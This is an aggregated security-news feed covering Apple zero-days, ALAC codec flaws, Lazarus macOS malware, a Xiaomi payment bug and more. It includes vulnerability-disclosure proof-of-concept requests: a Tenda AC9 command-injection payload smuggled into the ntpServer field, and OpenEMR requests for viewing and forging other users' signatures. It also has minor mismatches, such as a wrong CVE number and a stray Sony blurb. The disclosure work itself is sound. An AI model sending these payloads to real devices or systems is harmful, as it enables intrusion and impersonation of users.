Categories: Exploits and vulnerabilities
Categories: News
Tags: macOS

Tags:  iOS

Tags:  CVE-2022-32894

Tags:  CVE-2022-32893

Tags:  kernel privileges

Tags:  WebKit

Tags:  actively exploited

Tags:  watering hole

Tags:  exploit kit

Apple has released emergency security updates to fix two zero-day vulnerabilities previously exploited by attackers to hack iPhones, iPads, or Macs.



(Read more...)




The post Urgent update for macOS and iOS! Two actively exploited zero-days fixed appeared first on Malwarebytes Labs.

Apple has released emergency security updates to fix two zero-day vulnerabilities previously exploited by attackers to hack iPhones, iPads, or Macs.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs you need to know:

**Kernel privileges**

CVE-2022-32894: An out-of-bounds write issue was addressed with improved bounds checking. The vulnerability could allow an application to execute arbitrary code with kernel privileges. The kernel privileges are the highest possible privileges, so an attacker could take complete control of a vulnerable system by exploiting this vulnerability.

Apple points out that they are aware of a report that this issue may have been actively exploited.

**WebKit**

CVE-2022-32893: An out-of-bounds write issue was addressed with improved bounds checking. Processing maliciously crafted web content may lead to arbitrary code execution. An attacker could lure a potential victim to a specially crafted website or use malvertising to compromise a vulnerable system by exploiting this vulnerability. Since the vulnerability exists in Apple’s HTML rendering software (WebKit). WebKit powers all iOS web browsers and Safari, so possible targets are iPhones, iPads, and Macs which could all be tricked into running unauthorized code.

Apple points out that they are aware of a report that this issue may have been actively exploited.

**More details**

Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. And even then, it depends on the anonymous researcher(s) that reported the vulnerabilities whether we will ever learn the technical details. Or when someone is able to reverse engineer the update that fixes the vulnerability.

That being said, it seems likely that these vulnerabilities were found in an active attack that chained the two vulnerabilities together. The attack could, for example, be done in the form of a watering hole or as part of an exploit kit. CVE-2022-32892 could be exploited for initial code to be run. This code could be used to leverage CVE-2022-32894 to obtain kernel privileges

**Mitigation**

Users are under advice to implement the updates as soon as possible, by upgrading to:

*   iOS 15.6.1
*   iPadOS 15.6.
*   macOS Monterey 12.5.1

Details can be found on the security content for macOS page. And instructions to apply updates are available on the Apple Security Updates page.

Stay safe, everyone!

Urgent update for macOS and iOS! Two actively exploited zero-days fixed

Apple on Wednesday released security updates for iOS, iPadOS, and macOS platforms to remediate two zero-day vulnerabilities previously exploited by threat actors to compromise its devices.
The list of issues is below -

CVE-2022-32893 - An out-of-bounds issue in WebKit which could lead to the execution of arbitrary code by processing a specially crafted web content
CVE-2022-32894 - An

Apple on Wednesday released security updates for iOS, iPadOS, and macOS platforms to remediate two zero-day vulnerabilities previously exploited by threat actors to compromise its devices.

The list of issues is below -

*   **CVE-2022-32893** - An out-of-bounds issue in WebKit which could lead to the execution of arbitrary code by processing a specially crafted web content
*   **CVE-2022-32894** - An out-of-bounds issue in the operating system's Kernel that could be abused by a malicious application to execute arbitrary code with the highest privileges

Apple said it addressed both the issues with improved bounds checking, adding it's aware the vulnerabilities "may have been actively exploited."

The company did not disclose any additional information regarding these attacks or the identities of the threat actors perpetrating them, although it's likely that they were abused as part of highly-targeted intrusions.

The latest update brings the total number of zero-days patched by Apple to six since the start of the year -

*   **CVE-2022-22587** (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-22620** (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-22674** (Intel Graphics Driver) – An application may be able to read kernel memory
*   **CVE-2022-22675** (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges

Both the vulnerabilities have been fixed in iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1. The iOS and iPadOS updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Apple Releases Security Updates to Patch Two New Zero-Day Vulnerabilities

In Sony Xperia series 1, 5, and Pro, an out of bound memory access can occur due to lack of validation of the number of frames being passed during music playback.

May 18, 2022

**Research by:** Slava Makkaveev, Netanel Ben Simon

**Introduction**

The Apple Lossless Audio Codec (ALAC) is an audio coding format developed by Apple Inc. in 2004 for lossless data compression of digital music. After initially keeping it proprietary, in late 2011 Apple made the codec open source. Since then, the ALAC format has been embedded in many non-Apple audio playback devices and programs, including Android-based smartphones, and Linux and Windows media players and converters.

The open source ALAC decoder contains serious vulnerabilities. Apple keeps updating the proprietary version of the decoder and fixing security issues, but the shared code has not been patched since 2011. Many third-party vendors use the Apple-supplied code as the basis for their own ALAC implementations, and it’s fair to assume that many of them do not maintain the external code.

We discovered that MediaTek and Qualcomm, the two largest mobile chipset makers, ported the vulnerable ALAC code into their audio decoders, which are used in more than half of all smartphones worldwide. The ALAC issues we found could be used by an attacker for RCE on a mobile device through a malformed audio file. In addition, an unprivileged Android app can use these vulnerabilities to escalate its privileges and gain access to media data and user conversations.

Our goal was not to find all the projects that integrate the ALAC decoder, but we easily found several popular Ubuntu packages in the Universe repository that are also based on the vulnerable ALAC code and can be targeted by an attacker for RCE on an Ubuntu machine.

In this study, we focus on mobile devices.

**OpenMAX Codecs**

Open Media Acceleration (OpenMAX or OMX) is the set of C-language programming interfaces that provides abstractions useful for multimedia processing.

On Android devices, the Stagefright media playback engine integrates OpenMAX to recognize and use custom hardware-based multimedia codecs.

**Figure 1:** OpenMAX in Android media.

While Android provides built-in software codecs for common media formats, a hardware manufacturer can add an OpenMAX codec to decode/encode a specific one.

All media codecs presented on the device are listed in the /vendor/etc/media_codecs.xml file. According to the OpenMax specification, the codec name and content type must be declared for each codec.

**Figure 2:** Built-in software codecs.

An OpenMAX codec is a dynamic library that implements the corresponding decoding/encoding logic. The relationship table between the codec name and the library name is built into the OpenMAX Core library /vendor/lib/libOmxCore.so. On MediaTek devices, the /vendor/etc/mtk_omx_core.cfg configuration file contains this table in text format.

**Figure 3:** Core configuration.

Both MediaTek and Qualcomm provide custom OpenMAX decoders for the ALAC format. The ALAC declaration is shown in Figure 4, where the first line refers to MediaTek devices and the second line to those belonging to Qualcomm.

**Figure 4:** ALAC decoder declaration.

/vendor/lib/libMtkOmxAlacDec.so is the OpenMAX ALAC library on MediaTek devices and /vendor/lib/libOmxAlacDecSw.so is the library on Qualcomm. Media service /vendor/bin/hw/[email protected] loads the ALAC library when requested by an Android app, and then calls it to decode the supplied frames.

A malicious .m4a audio file can be used to attack a device even when played in a safe app based on the Android media framework. In addition, a malicious app can use a harmful frame to attack the privileged [email protected] service.

**Requesting frame decoding from the app**

The Android framework provides the android.media.MediaCodec class to access low-level media codecs.

We can create the ALAC decoder by using its name.

The configure method can be used to tune the decoder. A Codec-specific Data (csd-0) array allows us to set the frame length and bit depth parameters that we want to control in order to exploit the vulnerabilities.

To pass an arbitrary frame to the decoder for processing:

The Android app does not require any permissions to initiate decoding. To attack the media service, all we need to do is to prepare a malformed frame that causes the vulnerability.

**The ALAC vulnerabilities****MediaTek**

A quick look at the libMtkOmxAlacDec.so library showed that it is more likely based on the Shairport source code than on the code published by Apple. In fact, both sources are quite similar and have the same security issues.

The MtkOmxAlacDec::InitAlacDecoder method is responsible for initializing the ALAC decoder based on the csd-0 information provided by the app or included in the audio file header. The method calls the alac_init function, which fills an internal object with the audio parameters and allocates working buffers to store the decoded data.

The setinfo_max_samples_per_frame field of the alac object is initialized with the frame length (the first DWORD of the csd-0), and the setinfo_sample_size field is initialized with the bit depth.

The frame length times 4 of the heap memory is allocated as the outputsamples_buffer_a buffer. No integer overflow check is performed. In the 32-bit media server, if the provided frame length is greater than or equal to 0x40000000, the wrong amount of memory is allocated.

The MtkOmxAlacDec::DecodeAudio method is responsible for decoding the audio frame. It calls the alac_decode_frame function passing the alac object, the decoding frame, and an output buffer for decoded data as arguments.

The variable outputsamples is the number of samples to decode. As you can see, it is initialized with the setinfo_max_samples_per_frame at the beginning of the function, which is the maximum possible value of samples per frame. However, this variable can be corrected by the actual number of samples, the value of which is encoded in the frame itself. There are no validations associated with the outputsamples, so an invalid number could be provided. For example, in the frame in Figure 5, the number of samples is 0x41414141.

**Figure 5:** Malformed ALAC frame.

Several code snippets like the one shown below are implemented in the alac_decode_frame function to decode the frame data.

As you can see, outputsamples \* setinfo_sample_size bits are decoded from the input frame into the outputsamples_buffer_a buffer, the size of which is setinfo_max_samples_per_frame \* 4. We control all the involved values: the outputsamples, the setinfo_sample_size, the setinfo_max_samples_per_frame, and the decoding content.

For a heap data leak, we set the outputsamples and the setinfo_max_samples_per_frame to be larger than the input frame. In this case, the contents of the heap after the frame buffer are “decoded” to the outputsamples_buffer_a, which is then copied to the output buffer.

To overwrite the heap, we set the setinfo_max_samples_per_frame to be smaller than the input frame. In this case, the data is decoded outside the outputsamples_buffer_a buffer as determined by what we set in the outputsamples.

In Figure 6, you can see the crash dump caused by the malformed frame shown in Figure 5. The test device is the Xiaomi Redmi Note 9T 5G (MediaTek MT6853 Dimensity 800U 5G chipset) with MIUI Global 12.5.2.0 OS.

**Figure 6:** Crash dump of MediaTek’s ALAC decoder.

All of the described vulnerabilities can be exploited as they provide both read and write primitives.

**Qualcomm**

The ALAC decoder implemented by Qualcomm has exactly the same issues as the MediaTek’s decoder.

The OpenMAX libOmxAlacDecSw.so library is a wrapper over the libAlacSwDec.so, which is based on the source code shared by Apple.

The ALACDecoder::Init method allocates the mMixBufferU buffer to store the decoded data. The buffer size is 4 times the frame length specified in the csd-0 and controlled by the attacker.

The ALACDecoder::Decode method decodes ALAC frames. Again, there is no verification of the number of samples provided in the frame.

Depending on the numSamples and the size of the input frame, the mMixBufferU buffer can be overflowed with the input frame or filled with leaked data.

In Figure 7, you can see the crash dump of Qualcomm’s ALAC decoder. The test device is the Sony Xperia XZ Premium.

**Figure 7:** Crash dump of Qualcomm’s ALAC decoder.

**Conclusion**

We discovered several vulnerabilities in the Apple lossless audio codec that are relevant for smartphones with MediaTek and Qualcomm chipsets. Two thirds of all smartphones sold in 2021 are vulnerable.

The issues we found could be used by an attacker for RCE on a mobile device via a malicious audio file, or for LPE from an unprivileged Android application. The attacker could gain access to user conversations and stored media.

MediaTek assigned CVE-2021-0674 and CVE-2021-0675 to the ALAC issues. The vulnerabilities were already fixed and published in the December 2021 MediaTek Security Bulletin. Qualcomm released the patch for CVE-2021-30351 in the December 2021 Qualcomm Security Bulletin.

Check Point’s customers _remain fully protected_ against such threats while using Harmony Mobile Security.

CVE-2022-23747: #ALHACK: One codec to hack the whole world - Check Point Research

Google’s new mobile operating system has arrived. Take back some control with these privacy and security tips.

It's late summer in the northern hemisphere, which means new phone operating systems are coming. In a few weeks, Apple will release iOS 16 to millions of iPhones and iPads around the world. Google, meanwhile, has already made the latest version of Android available—on some phones you can now download Android 13.

The newest version of the Android operating system is more “evolution than revolution,” with the majority of changes smaller than in previous iterations. But Android’s security team is trying to simplify people’s privacy options throughout Android 13. This version of the OS involves changes under the hood for app developers and some streamlined security options for users.

You probably don’t spend a lot of time thinking about the privacy and security settings on your phone. However, whenever you download a new operating system, it’s worth spending a few minutes scrolling and tapping through all the options you haven’t touched in the past 12 months. Here’s what you should take a look at on Android 13.

Clamp Down on App Permissions

In Android 12, Google introduced “nearby device” permissions. This was designed to stop your headphones app from requesting your precise location when it was trying to wirelessly connect to your headphones. Android 13 expands on these controls to stop apps from using Wi-Fi permissions to collect your location data. In their code, app developers have to specify that they will never use Wi-Fi APIs to access location information.

Android’s **Privacy dashboard** has also been updated. The dashboard, which can be accessed through **Settings >** **Privacy**, shows the permissions you have given apps to use—this includes the apps that can access your camera, contacts, and multiple other sensors and types of data. It will now show which apps have used each permission over the past seven days, rather than just 24 hours.

Some of the privacy changes in Android 13 don’t require you to do anything, but it is worth knowing about them anyway. For instance, the OS will start deleting your clipboard history automatically after a short period of time so that apps don’t snoop on the information you previously copied. Also, from now on, apps that use Google’s advertising ID, which is a unique code assigned to your device, must declare the ad ID permission in their documentation. “If your app does not declare this permission when targeting Android 13 or higher, the advertising ID is automatically removed and replaced with a string of zeroes,” Google says.

Photo Picker

When you want to use a photo you’ve taken in another app—for instance, as a Twitter profile photo or to share images with friends—your device uses Photo Picker. This loads up a screen that includes the photos on your device and gives you the option to use them in the app you’re in. The new privacy changes in Android 13 mean you won’t automatically give an app access to all your photos and videos. Instead, the photo picker will now only give the app access to the photos you allow it.

In addition, Android’s developer pages state that if apps want to use images, audio, or video that other apps have created, they must explicitly say the type of files they want access to and give you clear prompts that this will happen.

More Notification Control

Few things are more infuriating than apps that send a constant barrage of notifications. And there are some notifications you may not want appearing on your screen for anyone nearby to see. While it has been possible to control app notifications for some time, Android 13 is making it easier to do so from the outset. Now, when you open up an app for the first time or use it for the first time in a while, you’ll be asked if you want it to send you notifications. Spammy notifications, be gone.

Other Security and Privacy Options

While you’re thinking about your phone’s privacy settings, it’s worth taking some time to flick through your device’s other options to boost your overall protection. It’s possible there are previous changes that you’ve missed. The vast majority of the settings below can be changed by visiting **Settings** on your Android and then following the specific options.

In the **Security** section, Android provides you with an overview of your device’s status. It will show you when the last security update was applied, let you set a screen lock and fingerprint or biometric unlocking (if your device supports them), and let you go through Google’s wider security checkup that looks at the current state of your accounts. (Later this year, Android will introduce a new **Security & privacy** option that will put all of these settings in one place.)

In the **Privacy** menu, there are a few things you should change. The **Privacy dashboard**, as described above, will show you which apps have used which sensors and data on your phone in the past seven days. After looking at this, you should tap on **Permission manager**, where you’ll be presented with all the sensors and types of data that your phone can give to apps. These range from your location and camera access to your calendar and files. You should look through each of the permissions and decide if an app really needs access to them to function.

Next in **Privacy**, you should open **Google location history** and **Activity controls**. Both of these options are linked to your wider Google account(s), but the settings here allow you to control what data Google keeps about you—it’s a lot. Using these options, you can wipe your web and activity data, the locations Google keeps on your movements, and details such as YouTube search history.

Then head to **Privacy** and **Ads**. Here you can use **Reset advertising ID** to change the ID Google has assigned to your phone. This advertising ID is used by apps and advertisers across the web to track your interests and show you potentially creepy personalized advertising. As well as resetting your ad ID, there’s an option to **Delete advertising ID**, meaning “apps can no longer use this advertising ID to show you personalized ads.”

Finally, while you’re thinking about your digital privacy and security, you should make sure you are using a password manager to protect your online life and using multi-factor authentication wherever possible.

The Android 13 Privacy Settings You Should Update Now

The North Korean APT is using a fake job posting for Coinbase in a cyberespionage campaign targeting users of both Apple and Intel-based systems.

The North Korean APT is using a fake job posting for Coinbase in a cyberespionage campaign targeting users of both Apple and Intel-based systems.

North Korean APT Lazarus is up to its old tricks with a cyberespionage campaign targeting engineers with a fake job posting that attempt to spread macOS malware. The malicious Mac executable used in the campaign targets both Apple and Intel chip-based systems.

The campaign, identified by researchers from ESET Research Labs and revealed in a series of tweets posted Tuesday, impersonates cryptocurrency trader Coinbase in a job description claiming to seek an engineering manager for product security, researchers divulged.

Dubbed Operation In(ter)ception, the recent campaign drops a signed Mac executable disguised as a job description for Coinbase, which researchers discovered uploaded to VirusTotal from Brazil, they wrote.“Malware is compiled for both Intel and Apple Silicon,” according to one of the tweets. “It drops three files: a decoy PDF document Coinbase\_online\_careers\_2022\_07.pdf, a bundle http\[://\]FinderFontsUpdater\[.\]app and a downloader safarifontagent.”

**Similarities to Previous Malware**

The malware is similar to a sample discovered by ESET in May, which also included a signed executable disguised as a job description, was compiled for both Apple and Intel, and dropped a PDF decoy, researchers said.

However, the most recent malware is signed July 21, according to its timestamp, which means it’s either something new or a variant of the previous malware. It uses a certificate issued in February 2022 to a developer named Shankey Nohria and which was revoked by Apple on Aug. 12, researchers said. The app itself was not notarized.

Operation In(ter)ception also has a companion Windows version of the malware dropping the same decoy and spotted Aug. 4 by Malwarebytes threat intelligence researcher Jazi, according to ESET.

The malware used in the campaign also connects to a different command and control (C2) infrastructure than the malware discovered in May, https:\[//\]concrecapital\[.\]com/%user%\[.\]jpg, which did not respond when researchers tried to connect to it.

**Lazarus on the Loose**

North Korea’s Lazarus is well known as one of the most prolific APTs and already is in the crosshairs of international authorities, having been sanctioned back in 2019 by the U.S. government.

Lazarus is known for targeting academics, journalists and professionals in various industries—particularly the defense industry–to gather intelligence and financial backing for the regime of Kim Jong-un. It has often used impersonation ploys similar to the one observed in Operation In(ter)ception to try to get victims to take the malware bait.

A previous campaign identified in January also targeted job-seeking engineers by dangling fake employment opportunities at them in a spear-phishing campaign. The attacks used Windows Update as a living-off-the-land technique and GitHub as a C2 server.

Meanwhile, a similar campaign uncovered last year saw Lazarus impersonating defense contractors Boeing and General Motors and claiming to seek job candidates only to spread malicious documents.

**Changing It Up**

However, more recently Lazarus has diversified its tactics, with the feds revealing that Lazarus also has been responsible for a number of crypto heists aimed at padding the regime of Jong-un with cash.

Related to this activity, the U.S. government levied sanctions against cryptocurrency mixer service Tornado Cash for helping Lazarus launder cash from its cybercriminal activities, which they believe in part are being to fund North Korea’s missile program.

Lazarus even has dipped its toe in ransomware amid its frenzy of cyberextortion activity. In May, researchers at cybersecurity firm Trellix tied the recently emerged VHD ransomware to the North Korean APT.

APT Lazarus Targets Engineers with macOS Malware

The North Korea-backed Lazarus Group has been observed targeting job seekers with malware capable of executing on Apple Macs with Intel and M1 chipsets.
Slovak cybersecurity firm ESET linked it to a campaign dubbed "Operation In(ter)ception" that was first disclosed in June 2020 and involved using social engineering tactics to trick employees working in the aerospace and military sectors into

The North Korea-backed Lazarus Group has been observed targeting job seekers with malware capable of executing on Apple Macs with Intel and M1 chipsets.

Slovak cybersecurity firm ESET linked it to a campaign dubbed "Operation In(ter)ception" that was first disclosed in June 2020 and involved using social engineering tactics to trick employees working in the aerospace and military sectors into opening decoy job offer documents.

The latest attack is no different in that a job description for the Coinbase cryptocurrency exchange platform was used as a launchpad to drop a signed Mach-O executable. ESET's analysis comes from a sample of the binary that was uploaded to VirusTotal from Brazil on August 11, 2022.

"Malware is compiled for both Intel and Apple Silicon," the company said in a series of tweets. "It drops three files: a decoy PDF document 'Coinbase\_online\_careers\_2022\_07.pdf', a bundle 'FinderFontsUpdater.app,' and a downloader 'safarifontagent.'"

The decoy file, while sporting the .PDF extension, is in reality a Mach-O executable that functions as a dropper to launch FinderFontsUpdater, which, in turn, executes safarifontsagent, a downloader designed to retrieve next-stage payloads from a remote server.

ESET stated that the lure was signed on July 21 using a certificate issued in February 2022 to a developer named Shankey Nohria. Apple has since moved to revoke the certificate on August 12.

It's worth noting the malware is cross-platform, as a Windows equivalent of the same PDF document was used to drop an .EXE file named "Coinbase\_online\_careers\_2022\_07.exe" earlier this month, as revealed by Malwarebytes researcher Hossein Jazi.

The Lazarus Group has emerged an expert of sorts when it comes to posing as HR representatives on social media platforms like LinkedIn to target companies that are of strategic interest.

Last month, it came to light that the $620 million Axie Infinity hack attributed to the collective was the result of one of its former employees getting duped by a fraudulent job offer on LinkedIn.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

North Korea Hackers Spotted Targeting Job Seekers with macOS Malware

The new feature detects attempts to modify files and processes for Microsoft Defender for Endpoints on macOS.

Microsoft has announced general availability of tamper protection in Microsoft Defender for Endpoint on macOS. The feature, which has been in public preview since May, will be rolling out over the next few days.

Tamper protection allows administrators who deal with Apple hardware in their environments to block the unauthorized removal of Microsoft Defender for Endpoint on macOS systems, as well as prevent any attempts to tamper with Microsoft Defender for Endpoint files, processes, and configuration settings. The feature elevates the organization’s endpoint security posture, Microsoft said in a post on the Microsoft Tech Community.

“Enhanced tamper resilience across prevalent platforms is a great advantage for organizations seeking to continuously enhance their endpoint security,” the company said.

Tamper protection is a device-level setting, which means the protection will apply to all users on the device. Available settings are “disabled,” “audit,” and “block.” By default, Microsoft Defender for Endpoint on macOS will have Tamper protection set to “audit,” so actions to uninstall the agent, modify Microsoft Defender files, or creating new files in the location where Microsoft Defender is installed will be logged automatically. However, administrators will not see any alerts in the Security Center – they will need to check either on-device logs or under the Advanced Hunting feature.

Tamper protection needs to be switched to “block” in order for administrators to see alerts and for tampering activities to be blocked. The company says a future rollout will automatically switch settings so that “block” becomes the default setting.

Administrators can enable the feature using a mobile device management platform, such as Endpoint Manager or Jamf. Tamper protection is available only for Microsoft Defender for Endpoint version 101.70.19 or above and on macOS versions Monterey, Big Sur, and Catalina.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Microsoft Rolls Out Tamper Protection for Macs

Tenda AC9 V15.03.2.21_cn is vulnerable to command injection via goform/SetSysTimeCfg.

The parameter Ntpserver is passed to tip\_sntp\_handle->doSystemCmd. A command injection vulnerability was formed.

    POST /goform/SetSysTimeCfg HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 76
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9150451753353981&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=25f9e794323b453885f5181f1b624d0btjotgb
    Connection: close
    
    timePeriod=86400&ntpServer="time.windows.com| ls > /tmp/f0und"&timeZone=20%3A00

CVE-2022-36273: CVEIDs/TendaAC9 at main · F0und-icu/CVEIDs

Mobile transactions could’ve been disabled, created and signed by attackers.

Mobile transactions could’ve been disabled, created and signed by attackers.

Smartphone maker Xiaomi, the world’s number three phone maker behind Apple and Samsung, reported it has patched a high-severity flaw in its “trusted environment” used to store payment data that opened some of its handsets to attack.

Researchers at Check Point Research revealed last week in a report released at DEF CON that the Xiaomi smartphone flaw could have allowed hackers to hijack the mobile payment system and disable it or create and sign their own forged transactions.

The potential pool of victims was massive, considering one in seven of the world’s smartphones are manufactured by Xiaomi, according to Q2/22 data from Canalys. The company is the third largest vendor globally, according to Canalys.  
“We discovered a set of vulnerabilities that could allow forging of payment packages or disabling the payment system directly, from an unprivileged Android application. We were able to hack into WeChat Pay and implemented a fully worked proof of concept,” wrote Slava Makkaveev, security researcher with Check Point.

He said, the Check Point study marks the first time Xiaomi’s trusted applications have been reviewed for security issues. WeChat Pay is a mobile payment and digital wallet service developed by a firm of the same name, which is based in China. The service is used by over 300 million customers and allows Android users to make mobile payments and online transactions.

**The Flaw**

It’s unclear how long the vulnerability existed or if it was exploited by attackers in the wild. The bug, tracked as CVE-2020-14125, was patched by Xiaomi in June and has a CVSS severity rating of high.

“A denial of service vulnerability exists in some Xiaomi models of phones. The vulnerability is caused by out-of-bound read/write and can be exploited by attackers to make denial of service,” according to the NIST common vulnerability and exposure description of the bug.

While details of the bug’s impact were limited at the time Xiaomi disclosed the vulnerability in June, researchers at Check Point have outlined in its postmortem of the patched bug and the full potential impact of the flaw.

The core issue with Xiaomi phone was the mobile phones payment method and the Trusted Execution Environment (TEE) component of the phone. The TEE is the Xiaomi’s virtual enclave of the phone, responsible for processing and storing ultra-sensitive security information such fingerprints and the cryptographic keys used in signing transactions.

“Left unpatched, an attacker could steal private keys used to sign WeChat Pay control and payment packages. Worst case, an unprivileged Android app could have created and signed a fake payment package,” researchers wrote.

Two types of attacks could have been performed against handsets with the flaw according to Check Point.

*   From an unprivileged Android app: The user installs a malicious application and launches it. The app extracts the keys and sends a fake payment packet to steal the money.
*   If the attacker has the target devices in their hands: The attacker rootes the device, then downgrades the trust environment, and then runs the code to create a fake payment package without an application.

**Two Ways to Skin a TEE**

Controlling the TEE, according to Check Point, is a MediaTek chip component that needed to be present to conduct the attack. To be clear, the flaw was not in the MediaTek chip – however the bug was only executable in phones configured with the MediaTek processor.

“The Asian market,” the researchers noted, is “mainly represented by smartphones based on MediaTek chips.” Xiaomi phones that run on MediaTek chips use a TEE architecture called “Kinibi,” within which Xiaomi can embed and sign their own trusted applications.

“Usually, trusted apps of the Kinibi OS have the MCLF format” – Mobicore Loadable Format – “but Xiaomi decided to come up with one of their own.” Within their own format, however, was a flaw: an absence of version control, without which “an attacker can transfer an old version of a trusted app to the device and use it to overwrite the new app file.” The signature between versions doesn’t change, so the TEE doesn’t know the difference, and it loads the old one.

In essence the attacker could’ve turned back time, bypassing any security fixes made by Xiaomi or MediaTek in the most sensitive area of the phone.

As a case-in-point, the researchers targeted “Tencent soter,” Xiaomi’s embedded framework providing an API to third-party apps that want to integrate mobile payments. Soter is what’s responsible for verifying payments between phones and backend servers, for hundreds of millions of Android devices worldwide. The researchers performed time travel to exploit an arbitrary read vulnerability in the soter app. This allowed them to steal the private keys used to sign transactions.

The arbitrary read vulnerability is already patched, while the version control vulnerability is “being fixed.”

In addition, the researchers came up with one other trick for exploiting soter.

Using a regular, unprivileged Android application, they were able to communicate with the trusted soter app via “SoterService,” an API for managing soter keys. “In practice, our goal is to steal one of the soter private keys,” the authors wrote. However, by performing a classic heap overflow attack, they were able to “completely compromise the Tencent soter platform,” allowing much greater power to, for example, sign fake payment packages.

**Phones Remain Un-scrutinized**

Mobile payments are already receiving more scrutiny from security researchers, as services like Apple Pay and Google Pay gain popularity in the West. But the issue is even more significant for the Far East, where the market for mobile payments is already way ahead. According to data from Statista, that hemisphere was responsible for a full two-thirds of mobile payments globally in 2021 – about four billion dollars in transactions in all.

And yet, the Asian market “has still not yet been widely explored,” the researchers noted. “No one is scrutinizing trusted applications written by device vendors, such as Xiaomi, instead of by chip manufacturers, even though security management and the core of mobile payments are implemented there.”

As previously noted, Check Point asserted this was the first time Xiaomi’s trusted applications have been reviewed for security issues.

Xiaomi Phone Bug Allowed Payment Forgery

Improper Access Control in GitHub repository openemr/openemr prior to 7.0.0.1.

**Description**

I observed that users can view any user's signature by changing their user parameter to other's user parameter. By the same way users can create/delete/update other's signature in create signature function.

**View/Get other's signature:**

    1. Login to an account (I use account receptionist).
    2. Click "Portal > Portal Audits > Home > Signature on File >  Use Current "  to view your own signature. Intercept this request with Burpsuite. ( Ensure you created your signature before).
    3. Modify user parameter to other's user parameter (I use admin's user parameter which has value is 5) 
    4. Send request, you will see the signature of admin is sent in response.
    

**Create/Update/Delete other's signature:**

    1. Login to an account (I use account receptionist).
    2. Click "Portal > Portal Audits > Home > Signature on File >  {Sign your signature} > Sign and Save "  to create your own signature. Intercept this request with Burpsuite. 
    3. Modify user parameter to other's user parameter (I use admin's user parameter which has value is 5) 
    4. Send this request.
    5. Login with admin account. You will see admin's signature was created.
    

**Proof of Concept****View/Get other's signature:**

    POST /openemr/portal/sign/lib/show-signature.php HTTP/1.1
    Host: demo.openemr.io
    Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
    Content-Length: 61
    Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    Accept: application/json, text/plain, */*
    Content-Type: application/json
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Sec-Ch-Ua-Platform: "Windows"
    Origin: https://demo.openemr.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.openemr.io/openemr/portal/patient/provider
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"pid":"0","user":"5","is_portal":0,"type":"admin-signature"}
    

**Create/Update/Delete other's signature:**

    POST /openemr/portal/sign/lib/save-signature.php HTTP/1.1
    Host: demo.openemr.io
    Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
    Content-Length: 39622
    Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Sec-Ch-Ua-Platform: "Windows"
    Content-Type: application/json
    Accept: */*
    Origin: https://demo.openemr.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.openemr.io/openemr/portal/patient/provider
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"pid":"0","user":"5","is_portal":0,"signer":"Barbara Wallace","type":"admin-signature","output":"content of signature image in base64"
    

**Impact**

Attacker can get/create/update any user's signature including admin's signature. As a result, he/she can impersonate admin or anyone to perform actions.

**Occurrences**

Tag

#apple